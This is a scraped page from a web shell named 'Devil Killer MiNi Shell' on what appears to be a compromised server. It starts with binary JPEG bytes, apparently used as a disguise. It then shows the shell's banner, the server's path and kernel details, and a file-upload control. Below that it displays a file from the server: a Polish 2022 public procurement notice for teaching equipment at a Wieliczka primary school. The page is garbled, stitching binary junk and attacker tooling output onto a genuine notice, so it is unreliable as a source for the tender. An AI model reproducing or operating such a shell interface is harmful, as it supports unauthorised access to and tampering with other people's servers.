JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220408/0011587201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu i pomocy dydaktycznych do Szkoły Podstawowej nr 1 im. Kazimierza Wielkiego w Wieliczce – edycja II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA NR 1 IM. KAZIMIERZA WIELKIEGO W WIELICZCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368033543</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 278 37 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sp1.wieliczka.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://sp1.wieliczka.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu i pomocy dydaktycznych do Szkoły Podstawowej nr 1 im. Kazimierza Wielkiego w Wieliczce – edycja II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01ceaf4e-b728-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00115872</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00115660/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu i pomocy dydaktycznych do Szkoły Podstawowej nr 1 im. Kazimierza Wielkiego w Wieliczce – edycja II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiotowe zamówienie jest elementem projektu realizowanego przez Zamawiającego pn. ,,Laboratoria Przyszłości&#34;, współfinansowanego ze Środków Funduszu Przeciwdziałania COVID-19 i przeznaczonego na wsparcie jednostek samorządu terytorialnego w realizacji inwestycyjnych zadań polegających na rozwijaniu szkolnej infrastruktury 2.16.) Tryb </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/sp1wieliczka,m,43038,zamowienia-publiczne.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, oraz poczty elektronicznej sekretariat@sp1.wieliczka.eu<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do: formularza do<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji. Strona postępowania<br/>https://bip.malopolska.pl/sp1wieliczka,m,43038,zamowienia-publiczne.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do: formularza do<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji. 2. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu oraz Regulaminu ePUAP. 3. Wykonawca przystępując<br/>do postępowania o udzielenie zamówienia publicznego, akceptuje postanowienia regulaminów, o<br/>których mowa powyżej, a także instrukcji użytkowania systemu miniPortal oraz uznaje je za wiążące.<br/>4.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.5. Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub<br/>na adres poczty elektronicznej wskazanej do kontaktu w niniejszym postępowaniu . Identyfikator<br/>postępowania jest dostępny są na Liście wszystkich postępowań na miniPortalu. Dane postępowanie<br/>można wyszukać na Liście wszystkich postępowań klikając wcześniej opcję ,,Dla Wykonawców’’ lub ze<br/>strony głównej z zakładki Postępowania na miniPortalu. 7. Nazwa odbiorcy na platformie ePUAP:<br/>/SP1_Wieliczka/<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami (za<br/>wyjątkiem złożenia oświadczenia z art. 125 ust. 1 pzp i oferty wraz z załącznikami) w szczególności<br/>składanie<br/>oświadczeń,wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji), a także za pomocą poczty elektronicznej wskazanej do<br/>kontaktu w niniejszym postępowaniu 9. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania ( lub ID<br/>postępowania).10.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub<br/>oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako<br/>załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na<br/>wskazany adres e-mail. 11. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>z 2020, poz. 2452) oraz rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz.U. z 2020, poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzeniem<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (zwanym dalej Rozporządzenie RODO), informuję, iż:<br/>1. Administratorem danych osobowych jest Szkoła Podstawowa nr 1 im. Kazimierza Wielkiego w<br/>Wieliczce, reprezentowana przez Dyrektora z siedzibą przy ul. Marszałka Józefa Piłsudskiego 20, 32-<br/>020 Wieliczka, sekretariat@sp1.wieliczka.eu tel:/fax: 12 2783788<br/>2. W Szkole Podstawowej nr 1 im. Kazimierza Wielkiego w Wieliczce, został powołany inspektor<br/>danych osobowych Pan Tomasz Więckowski i ma Pani/Pan prawo kontaktu z nim za pomocą adresu email<br/>iod2@synergiaconsulting.pl tel:(+48) 693 337 954 lub pisemnie na adres wskazany w pkt. 1<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu:<br/>1) realizacji obowiązków prawnych związanych z procesem nauczania, działalnością wychowawczą i<br/>opiekuńczą,<br/>2) promocji działalności szkoły oraz osiągnięć i umiejętności ucznia za zgodą rodzica (opiekuna<br/>prawnego) wyrażoną w trybie art. 6 pkt 1. a) Rozporządzenia RODO<br/>4. Pani/Pana dane osobowe nie są udostępniane innym odbiorcom z wyłączeniem podmiotów do tego<br/>uprawnionych takich jak:<br/>1) podmioty upoważnione do odbioru danych osobowych na podstawie odpowiednich przepisów<br/>prawa, 2) podmioty, które przetwarzają dane osobowe w imieniu Administratora na podstawie zawartej z<br/>Administratorem umowy powierzenia przetwarzania danych osobowych.<br/>5. Pani/Pana dane osobowe po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane w<br/>celach archiwalnych i przechowywane przez okres niezbędny wynikający z przepisów dotyczących<br/>archiwizowania dokumentów obowiązujących u Administratora (Rzeczowy Wykaz Akt).<br/>6. Posiada Pani/Pan prawo:<br/>1) dostępu do treści swoich danych,<br/>2) żądania sprostowania danych, które są nieprawidłowe,<br/>3) żądania usunięcia danych, gdy:<br/>– dane nie są już niezbędne do celów, dla których zostały zebrane<br/>– dane przetwarzane są niezgodnie z prawem;<br/>4) prawo do przenoszenia danych, na podstawie art. 20 Rozporządzenia RODO,<br/>5) prawo do wniesienia sprzeciwu wobec przetwarzania Państwa danych osobowych na podstawie art.<br/>21 Rozporządzenia RODO<br/>6) ograniczenia przetwarzania, gdy:<br/>– osoba, której dane dotyczą, kwestionuje prawidłowość danych osobowych<br/>– przetwarzanie jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu<br/>danych osobowych, żądając w zamian ograniczenia ich wykorzystywania,<br/>– administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale są one potrzebne<br/>osobie, której dane dotyczą, do ustalenia, dochodzenia lub obrony roszczeń;<br/>7) prawo do odwołania zgody w dowolnym momencie wobec przetwarzania danych osobowych<br/>opartego na art. 6 pkt 1. a) bez wpływu na zgodność z prawem przetwarzania, którego dokonano na<br/>podstawie zgody przed jej cofnięciem.<br/>7. Przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016 r.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa wyposażenia wraz z montażem, instalacją i<br/>przeszkoleniem obsługi dla Szkoły Podstawowej nr 1 w Wieliczce w ramach programu pn.”Laboratoria Przyszłości” inicjatywa edukacyjna realizowana przez Ministerstwo Edukacji i<br/>Nauki z Centrum GovTech w Kancelarii Prezesa Rady Ministrów.<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 5, 6 i 7 do SWZ –<br/>OPZ.<br/>3. Koszt dostawy wraz z wniesieniem na miejsce wskazane przez Zamawiającego (tj.: ul.<br/>Marszałka Józefa Piłsudskiego 20, 32-020 Wieliczka) pokrywa we własnym zakresie<br/>Wykonawca.<br/>4. Wykonawca dostarczy oraz przekaże pracownikowi dokonującemu odbioru ze strony<br/>Zamawiającego sprzęt w oryginalnym opakowaniu wraz z licencjami, dokumentacją użytkową,<br/>gwarancją, płytami instalacyjnymi, sterownikami, certyfikatami itp<br/>5. Produkty będące przedmiotem zamówienia muszą być:<br/>a) fabrycznie nowe;<br/>b) wolne od wad fizycznych i prawnych;<br/>c) dostarczone w oryginalnych opakowaniach fabrycznych producenta;<br/>d) dostarczone wraz z kompletem standardowej dokumentacji dla użytkownika w formie<br/>papierowej lub elektronicznej;<br/>e) zgodne z odpowiednimi normami i innymi wymaganiami formalnymi </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30232000-4 - Sprzęt peryferyjny</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">39160000-1 - Meble szkolne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa wyposażenia wraz z montażem, instalacją i<br/>przeszkoleniem obsługi dla Szkoły Podstawowej nr 1 w Wieliczce w ramach programu<br/>pn.”Laboratoria Przyszłości” inicjatywa edukacyjna realizowana przez Ministerstwo Edukacji i<br/>Nauki z Centrum GovTech w Kancelarii Prezesa Rady Ministrów.<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 5, 6 i 7 do SWZ –<br/>OPZ.<br/>3. Koszt dostawy wraz z wniesieniem na miejsce wskazane przez Zamawiającego (tj.: ul.<br/>Marszałka Józefa Piłsudskiego 20, 32-020 Wieliczka) pokrywa we własnym zakresie<br/>Wykonawca.<br/>4. Wykonawca dostarczy oraz przekaże pracownikowi dokonującemu odbioru ze strony<br/>Zamawiającego sprzęt w oryginalnym opakowaniu wraz z licencjami, dokumentacją użytkową,<br/>gwarancją, płytami instalacyjnymi, sterownikami, certyfikatami itp<br/>5. Produkty będące przedmiotem zamówienia muszą być:<br/>a) fabrycznie nowe;<br/>b) wolne od wad fizycznych i prawnych;<br/>c) dostarczone w oryginalnych opakowaniach fabrycznych producenta;<br/>d) dostarczone wraz z kompletem standardowej dokumentacji dla użytkownika w formie<br/>papierowej lub elektronicznej;<br/>e) zgodne z odpowiednimi normami i innymi wymaganiami formalnymi </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39160000-1 - Meble szkolne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie z art. 125 ust. 1</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy– Załącznik nr 1 do SWZ;<br/>2. Formularz asortymentowo-cenowy – załącznik nr 2. (2a-2b)<br/>3.Pełnomocnictwo (jeśli dotyczy):<br/>a) Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania<br/>umowy. b) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wykonawcy są zobowiązani do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie<br/>zamówienia tych wykonawców, należy załączyć do oferty <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania 